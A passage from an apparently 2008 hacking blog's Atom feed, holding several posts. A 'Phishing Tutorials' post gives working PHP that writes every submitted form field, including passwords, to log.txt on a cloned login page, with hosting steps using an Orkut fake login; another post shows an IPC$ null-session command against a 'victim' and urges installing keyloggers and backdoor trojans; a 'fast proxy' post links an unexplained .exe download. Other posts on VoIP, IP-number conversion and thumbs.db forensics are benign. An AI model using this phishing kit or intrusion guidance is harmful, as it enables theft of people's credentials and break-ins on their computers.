/&gt;&lt;br /&gt;Windows Me&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Using IPC$ to hack Windows NT,2000,XP&lt;br /&gt;&lt;br /&gt;Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.&lt;br /&gt;&lt;br /&gt;IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.&lt;br /&gt;&lt;br /&gt;We hackers use IPC$ in this way&lt;br /&gt;&lt;br /&gt;c:\windows&gt;net use k:  \\123.123.123.123\ipc$ "" /user:""&lt;br /&gt;&lt;br /&gt;You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.&lt;br /&gt;&lt;br /&gt;Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Penetrating in to the victim's computer&lt;br /&gt;&lt;br /&gt;Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...&lt;br /&gt;&lt;br /&gt;But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Lets Hack - Part 2 Denial of service attack&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Note- This tutorial may bear a resemblance to tutorials written by other authors&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-2940993894820109132?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/2940993894820109132/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=2940993894820109132' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2940993894820109132'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2940993894820109132'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/hacking-with-netbios.html' title='Hacking with NetBIOS'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-6244549804016372499</id><published>2008-08-23T08:13:00.000-07:00</published><updated>2008-08-23T08:14:07.593-07:00</updated><title type='text'>Voice-over-Internet protocol [VOIP]</title><content type='html'>&lt;span style="font-style: italic; font-size: 100%;"&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;Voice-over-Internet protocol is a protocol optimized for the transmission of voice through the Internet or other packet-switched networks. VoIP is often used abstractly to refer to the actual transmission of voice (rather than the protocol implementing it). This latter concept is also referred to as IP telephony, Internet telephony, voice over broadband, broadband telephony, and broadband phone.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;VoIP providers may be viewed as commercial realizations of the experimental Network Voice Protocol (1973) invented for the ARPANET providers. Some cost savings are due to using a single network to carry voice and data, especially where users have underused network capacity that can carry VoIP at no additional cost. VoIP-to-VoIP phone calls are sometimes free, while VoIP calls connecting to public switched telephone networks (VoIP-to-PSTN) may have a cost that is borne by the VoIP user.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;Voice-over-IP systems carry telephony signals as digital audio, typically reduced in data rate using speech data compression techniques, encapsulated in a data-packet stream over IP.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;There are two types of PSTN-to-VoIP services: Direct inward dialing (DID) and access numbers. DID will connect a caller directly to the VoIP user, while access numbers require the caller to provide an extension number for the called VoIP user.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;*Mobile Number Portability (MNP) in the Internet Telephony Environment&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;Mobile number portability (MNP) also impacts the internet telephony, or VOIP (Voice over IP) business. A voice call originated in the VOIP environment which is routed to a mobile phone number of a traditional mobile carrier also face challenges to reach its destination in case the mobile phone number is ported. Mobile number portability is a service that makes it possible for subscribers to keep their existing mobile phone number when changing the service provider (or mobile operator).&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;VoIP is clearly identified as a Least Cost Routing (LCR) voice routing system, which is based on checking the destination of each telephone call as it is made, and then sending the call via the network that will cost the customer the least. With GSM number portability now in place, LCR providers can no longer rely on using the network root prefix to determine how to route a call. Instead, they now need to know the actual current network of every number before routing the call.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;Therefore, VoIP solutions also need to handle MNP when routing a voice call. In countries without a central database like UK it might be necessary to query the GSM network about the home network a mobile phone number belongs to. As VoIP starts to take off in the enterprise markets because of least cost routing options, it needs to provide a certain level of reliability when handling calls.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;MNP checks are important to assure that this quality of service is met; by handling MNP lookups before routing a call and assuring that the voice call will actually work, VoIP companies give businesses the necessary reliability they look for in an internet telephony provider. UK-based messaging operator Tyntec provides a Voice Network Query service, which helps not only traditional voice carriers but also VoIP providers to query the GSM network to find out the home network of a ported number.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;In countries such as Singapore, the most recent Mobile number portability solution is expected to open the doors to new business opportunities for non-traditional telecommunication service providers like wireless broadband providers and voice over IP (VoIP) providers.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;In November 2007, the Federal Communications Commission in the United States released an order extending number portability obligations to interconnected VoIP providers and carriers that support VoIP providers.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;*Mobile phones and hand-held devices&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;Telcos and consumers have invested billions of dollars in mobile phone equipment. In developed countries, mobile phones have achieved nearly complete market penetration, and many people are giving up landlines and using mobiles exclusively. Given this situation, it is not entirely clear whether there would be a significant higher demand for VoIP among consumers until either public or community wireless networks have similar geographical coverage to cellular networks (thereby enabling mobile VoIP phones, so called WiFi phones or VoWLAN) or VoIP is implemented over 3G networks. However, "dual mode" telephone sets, which allow for the seamless handover between a cellular network and a WiFi network, are expected to help VoIP become more popular.[12]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;Phones like the NEC N900iL, and later many of the Nokia Eseries and several WiFi enabled mobile phones have SIP clients hardcoded into the firmware. Such clients operate independently of the mobile phone network unless a network operator decides to remove the client in the firmware of a heavily branded handset. Some operators such as Vodafone actively try to block VoIP traffic from their network[13] and therefore most VoIP calls from such devices are done over WiFi.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;Several WiFi only IP hardphones exist, most of them supporting either Skype or the SIP protocol. These phones are intended as a replacement for PSTN based cordless phones but can be used anywhere where WiFi internet access is available.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-weight: bold;"&gt;Another addition to hand held devices are ruggedized bar code type devices that are used in warehouses and retail environments. These type of devices rely on "inside the 4 walls" type of VoIP services that do not connect to the outside world and are solely to be used from employee to employee communications.&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-6244549804016372499?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/6244549804016372499/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=6244549804016372499' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/6244549804016372499'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/6244549804016372499'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/voice-over-internet-protocol-voip.html' title='Voice-over-Internet protocol [VOIP]'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3762377401844257931</id><published>2008-08-20T01:04:00.001-07:00</published><updated>2008-08-20T01:05:56.262-07:00</updated><title type='text'>Phishing Tutorials</title><content type='html'>&lt;b&gt;Ok so first:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1- Go take the source of the website you want to phish.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2-When you got it, create on your desktop a file named index.txt&lt;br /&gt;&lt;br /&gt;in that one, you will paste the source.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3- verify that all the images and other files like javascript and css are linked to the originale website. so if the website is &lt;/b&gt;&lt;br /&gt;&lt;!--c1--&gt;&lt;div class="codetop"&gt;CODE&lt;/div&gt;&lt;div class="codemain"&gt;&lt;!--ec1--&gt;http://www.website.com/file.html&lt;!--c2--&gt;&lt;/div&gt;&lt;!--ec2--&gt;, copy &lt;!--c1--&gt;&lt;div class="codetop"&gt;CODE&lt;/div&gt;&lt;div class="codemain"&gt;&lt;!--ec1--&gt;http://www.website.com/&lt;!--c2--&gt;&lt;/div&gt;&lt;!--ec2--&gt;&lt;br /&gt;&lt;b&gt;before all other files that you find. so if an image is image/poo.gif, it should be&lt;/b&gt;&lt;img src="http://www.website.com/image/poo.gif" class="linked-image" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;4- after all that is done, change the .txt extension to .htm or .html&lt;br /&gt;and verify the website looks the same. if it doesnt, it is maybe&lt;br /&gt;because the css contains images. then you would need to download the&lt;br /&gt;css, and make the same process as 3rd step.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Not that if you upload the new css on ur host, you dont need to put the&lt;br /&gt;real host in front of it. if it is in the same path as index.html, you&lt;br /&gt;can let is as stylesheet.css or whatever it is&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;5-make a file named post.txt and add the following content in it:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;PHP Code:&lt;/b&gt;&lt;br /&gt;&lt;!--c1--&gt;&lt;div class="codetop"&gt;CODE&lt;/div&gt;&lt;div class="codemain"&gt;&lt;!--ec1--&gt;&lt;?php&lt;br /&gt;&lt;br /&gt;header ('Location: [url="http://THE"]http://THE[/url] ORIGINAL WEBSITE HERE ');&lt;br /&gt;&lt;br /&gt;$handle = fopen("log.txt", "a");&lt;br /&gt;&lt;br /&gt;foreach($_POST as $variable =&gt; $value) {&lt;br /&gt;&lt;br /&gt;fwrite($handle, $variable);&lt;br /&gt;&lt;br /&gt;fwrite($handle, "=");&lt;br /&gt;&lt;br /&gt;fwrite($handle, $value);&lt;br /&gt;&lt;br /&gt;fwrite($handle, "\r\n");&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;fwrite($handle, "\r\n");&lt;br /&gt;&lt;br /&gt;fclose($handle);&lt;br /&gt;&lt;br /&gt;exit;&lt;br /&gt;&lt;br /&gt;?&gt;&lt;!--c2--&gt;&lt;/div&gt;&lt;!--ec2--&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;change the extension .txt to .php. after that, you need to&lt;br /&gt;gochange the place where the html file send the information. so open&lt;br /&gt;your index.html with notepad and search action=. after u found it,&lt;br /&gt;change the content in the " " to post.php.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;6-now simply create file name log.txt where alll password of phished material will come&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;!--coloro:#FF0000--&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;!--/coloro--&gt;Now U Need A Host i prefer by way freehostia.com&lt;br /&gt;&lt;br /&gt;How To Register and Upload Their&lt;!--colorc--&gt;&lt;/span&gt;&lt;!--/colorc--&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1 First Goto This url &lt;!--c1--&gt;&lt;div class="codetop"&gt;CODE&lt;/div&gt;&lt;div class="codemain"&gt;&lt;!--ec1--&gt;http://freehostia.com/signup.html&lt;!--c2--&gt;&lt;/div&gt;&lt;!--ec2--&gt;&lt;br /&gt;&lt;br /&gt; And Register for a free account their.In The Domain Name Select Use a subdomain.&lt;br /&gt;&lt;br /&gt;2 Login To Your Cpanel And select Site Management&lt;br /&gt;&lt;br /&gt;&lt;div title="Click to view full image" class="resized-linked-image" style="padding: 2px; width: 508px;"&gt;&lt;img src="http://games-for-gamers.com/forum/style_images/new-g4g1218654459/img-resized.png" style="vertical-align: middle;" alt="" border="0" /&gt; Reduced: 50% of original size [ 1018 x 239 ] - Click to view full image&lt;/div&gt;&lt;img id="--ipb-img-resizer-2" src="http://i25.tinypic.com/2viqn0x.png" class="linked-image" border="0" width="512" /&gt;&lt;br /&gt;&lt;br /&gt;3 Now Select File Manage&lt;br /&gt;&lt;br /&gt;&lt;div title="Click to view full image" class="resized-linked-image" style="padding: 2px; width: 508px; cursor: pointer;"&gt;&lt;img src="http://games-for-gamers.com/forum/style_images/new-g4g1218654459/img-resized.png" style="vertical-align: middle;" alt="" border="0" /&gt; Reduced: 50% of original size [ 1015 x 283 ] - Click to view full image&lt;/div&gt;&lt;img id="--ipb-img-resizer-4" src="http://i26.tinypic.com/6tl36e.png" class="linked-image" border="0" width="512" /&gt;&lt;br /&gt;&lt;br /&gt;4 Now Click Your Domain Name (Wait For some minutes If the Url is Not listed)&lt;br /&gt;&lt;br /&gt;&lt;div title="Click to view full image" class="resized-linked-image" style="padding: 2px; width: 508px; cursor: pointer;"&gt;&lt;img src="http://games-for-gamers.com/forum/style_images/new-g4g1218654459/img-resized.png" style="vertical-align: middle;" alt="" border="0" /&gt; Reduced: 68% of original size [ 748 x 382 ] - Click to view full image&lt;/div&gt;&lt;img id="--ipb-img-resizer-6" src="http://i31.tinypic.com/9genv4.png" class="linked-image" border="0" width="512" /&gt;&lt;br /&gt;&lt;br /&gt;5 Select browse And Uplaod all The Files&lt;br /&gt;&lt;br /&gt;&lt;div title="Click to view full image" class="resized-linked-image" style="padding: 2px; width: 508px; cursor: pointer;"&gt;&lt;img src="http://games-for-gamers.com/forum/style_images/new-g4g1218654459/img-resized.png" style="vertical-align: middle;" alt="" border="0" /&gt; Reduced: 73% of original size [ 696 x 329 ] - Click to view full image&lt;/div&gt;&lt;img id="--ipb-img-resizer-8" src="http://i28.tinypic.com/2ldy613.png" class="linked-image" border="0" width="512" /&gt;&lt;br /&gt;&lt;br /&gt;6 I Have taken Example Of Orkut Fake Login Page&lt;br /&gt;&lt;br /&gt; &lt;br /&gt; get The Url Of the .html Page&lt;br /&gt;&lt;br /&gt; like This (Your Domain name).freehostia.com/orkut.html&lt;br /&gt;&lt;br /&gt;&lt;div title="Click to view full image" class="resized-linked-image" style="padding: 2px; width: 508px; cursor: pointer;"&gt;&lt;img src="http://games-for-gamers.com/forum/style_images/new-g4g1218654459/img-resized.png" style="vertical-align: middle;" alt="" border="0" /&gt; Reduced: 72% of original size [ 709 x 332 ] - Click to view full image&lt;/div&gt;&lt;img id="--ipb-img-resizer-10" src="http://i30.tinypic.com/2akab2h.png" class="linked-image" border="0" width="512" /&gt;&lt;br /&gt;&lt;br /&gt;7 A new .TXT file will appear in the Directory were u have Uploaded all the files Cointaing&lt;br /&gt;The login imformation&lt;br /&gt;&lt;br /&gt;&lt;div title="Click to view full image" class="resized-linked-image" style="padding: 2px; width: 508px; cursor: pointer;"&gt;&lt;img src="http://games-for-gamers.com/forum/style_images/new-g4g1218654459/img-resized.png" style="vertical-align: middle;" alt="" border="0" /&gt; Reduced: 74% of original size [ 683 x 367 ] - Click to view full image&lt;/div&gt;&lt;img id="--ipb-img-resizer-12" src="http://i28.tinypic.com/2yy61as.png" class="linked-image" border="0" width="512" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7 Now Check the Box near Logins and select permission 700 and click change&lt;br /&gt;&lt;br /&gt;&lt;div title="Click to view full image" class="resized-linked-image" style="padding: 2px; width: 508px; cursor: pointer;"&gt;&lt;img src="http://games-for-gamers.com/forum/style_images/new-g4g1218654459/img-resized.png" style="vertical-align: middle;" alt="" border="0" /&gt; Reduced: 72% of original size [ 707 x 334 ] - Click to view full image&lt;/div&gt;&lt;img id="--ipb-img-resizer-14" src="http://i27.tinypic.com/25tz57d.png" class="linked-image" border="0" width="512" /&gt;&lt;br /&gt;&lt;br /&gt;   Thats All Happy Hacking&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Self Made Tutorial Say Thanks If u Like It&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3762377401844257931?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3762377401844257931/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3762377401844257931' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3762377401844257931'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3762377401844257931'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/phishing-tutorials.html' title='Phishing Tutorials'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://i25.tinypic.com/2viqn0x_th.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-4124731258630070010</id><published>2008-08-20T01:02:00.000-07:00</published><updated>2008-08-20T01:04:01.215-07:00</updated><title type='text'>Fast Proxy</title><content type='html'>&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;b&gt;Presenting And Unlimited Fast Proxy For You Guise To Surf Anonymously Around The Net . They Are Very Fast And Unblocks All Softwares And Sites&lt;/b&gt;&lt;!--colorc--&gt;&lt;/span&gt;&lt;!--/colorc--&gt;&lt;br /&gt;&lt;br /&gt;*****************************&lt;br /&gt;&lt;br /&gt;Download:&lt;br /&gt;&lt;!--c1--&gt;&lt;div class="codetop"&gt;CODE&lt;/div&gt;&lt;div class="codemain"&gt;&lt;!--ec1--&gt;http://rapidshare.com/files/114653845/U89.exe&lt;!--c2--&gt;&lt;/div&gt;&lt;!--ec2--&gt;&lt;br /&gt;&lt;br /&gt;Found It While Surfing &lt;img src="http://www.games-for-gamers.com/forum/style_emoticons/default/biggrin.gif" style="vertical-align: middle;" emoid=":D" alt="biggrin.gif" border="0" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-4124731258630070010?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/4124731258630070010/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=4124731258630070010' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4124731258630070010'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4124731258630070010'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/fast-proxy.html' title='Fast Proxy'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3971183575590098426</id><published>2008-08-19T23:34:00.001-07:00</published><updated>2008-08-19T23:34:56.030-07:00</updated><title type='text'>Convert an IP address to an IP Number</title><content type='html'>&lt;h3 style="color: rgb(51, 51, 255);" class="smller"&gt;Convert an IP address to an IP Number&lt;/h3&gt; &lt;div class="para"&gt; IP address (IPv4 / IPv6) is divided into 4 sub-blocks. Each sub-block has a different weight number each powered by 256. IP number is being used in the database because it is efficient to search between a range of number in database.&lt;br /&gt;&lt;br /&gt;Beginning IP number and Ending IP Number are calculated based on following formula:&lt;br /&gt;&lt;br /&gt;IP Number = 16777216*w + 65536*x + 256*y + z (Formula 1)&lt;br /&gt;&lt;br /&gt;where&lt;br /&gt;IP Address = w.x.y.z&lt;br /&gt;&lt;br /&gt;For example, if IP address is "202.186.13.4", then its IP Number "3401190660" is based on the Formula 1.&lt;br /&gt;&lt;br /&gt;IP Address = 202.186.13.4&lt;br /&gt;&lt;br /&gt;So, w = 202, x = 186, y = 13 and z = 4&lt;br /&gt;&lt;br /&gt;IP Number = 16777216*202 + 65536*186 + 256*13 + 4&lt;br /&gt;= 3388997632 + 12189696 + 3328 + 4&lt;br /&gt;= 3401190660&lt;br /&gt;&lt;br /&gt;To reverse IP number to IP address,&lt;br /&gt;&lt;br /&gt;w = int ( IP Number / 16777216 ) % 256&lt;br /&gt;x = int ( IP Number / 65536 ) % 256&lt;br /&gt;y = int ( IP Number / 256 ) % 256&lt;br /&gt;z = int ( IP Number ) % 256&lt;br /&gt;&lt;br /&gt;where % is the mod operator and int is return the integer part of the division. &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3971183575590098426?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3971183575590098426/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3971183575590098426' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3971183575590098426'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3971183575590098426'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/convert-ip-address-to-ip-number.html' title='Convert an IP address to an IP Number'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-8985997360683266309</id><published>2008-08-19T23:30:00.001-07:00</published><updated>2008-12-08T15:33:30.291-08:00</updated><title type='text'>Demystify “thumbs.db”</title><content type='html'>&lt;h3 style="color: rgb(102, 51, 255);" class="smller"&gt;Demystify “thumbs.db”&lt;/h3&gt; &lt;div class="para"&gt; Are you working as a cyber crime investigator and looking for something which can prove in court of law that there was some pornographic content on the suspect’s machine? Let me help you out in this case.There is a file with a name “thumbs.db” which is automatically generated by Windows XP whenever user views the folder or image in thumbs view or in filmstrip view. Automatic generation of this file is ON by default. Thumbs.db contains a copy of each of the tiny preview images generated for image files in that folder so that they load up quickly the next time you browse that folder. If a user tries to view this file by any image viewer then it will be of no use. For extracting the juicy content from this file, forensic investigator has to understand the header of the thumbs file present in thumbs.db. Let me explain step by step on how to extract useful content from thumbs.db file.&lt;br /&gt;&lt;br /&gt;Open any folder which has got some jpeg files and make that folder view in thumbs view as shown in&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_kEJJtYsk89Q/SHuoc0ClK1I/AAAAAAAAAQQ/zCYf8K2-ez4/s320/fig1.JPG" target="_blank"&gt;http://2.bp.blogspot.com/_kEJJtYsk89Q/SHu&lt;wbr&gt;oc0ClK1I/AAAAAAAAAQQ/zCYf8K2-ez4/s320/fi&lt;wbr&gt;g1.JPG&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;As soon as the folder is kept in thumbs view “thumbs.db” file is created. Even if all JPEG files are deleted and thumbs.db file corresponding to those JPEG files is present, then also you can see the images but they will be very small in size. Thumbs.db which was created is now viewed using winhex. Once the file has been opened in winhex view, we will search and select for particular header. Header is “ÿØÿà JFIF” and its hex values are “FFD8FFE000104A464946″. This is shown in an example :-&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_kEJJtYsk89Q/SHupjF2pUtI/AAAAAAAAAQg/xcYNtEqSxE0/s400/fig2.JPG" target="_blank"&gt;http://3.bp.blogspot.com/_kEJJtYsk89Q/SHu&lt;wbr&gt;pjF2pUtI/AAAAAAAAAQg/xcYNtEqSxE0/s400/fi&lt;wbr&gt;g2.JPG&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Copy the entire content in a notepad where the header is starting till the end of the file and save the file with the extension JPEG. You can now easily view the extracted content with any of the image viewer. If there are large number of headers in thumbs.db file, then you can use professional tool like “Windows File Analyzer” to see the contents of thumbs.db file. &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-8985997360683266309?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/8985997360683266309/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=8985997360683266309' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8985997360683266309'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8985997360683266309'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/demystify-thumbsdb.html' title='Demystify “thumbs.db”'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-4384706661541439778</id><published>2008-08-19T23:25:00.000-07:00</published><updated>2008-08-19T23:26:58.963-07:00</updated><title type='text'>WEBSITE OF CYBER CRIME CELL MUMBAI</title><content type='html'>&lt;h3 class="smller"&gt;WEBSITE OF CYBER CRIME CELL MUMBAI&lt;/h3&gt; &lt;div class="para"&gt; &lt;a href="http://www.cybercellmumbai.com/" target="_blank"&gt;http://www.cybercellmumbai.com&lt;/a&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-4384706661541439778?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/4384706661541439778/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=4384706661541439778' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4384706661541439778'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4384706661541439778'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/website-of-cyber-crime-cell-mumbai.html' title='WEBSITE OF CYBER CRIME CELL MUMBAI'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image 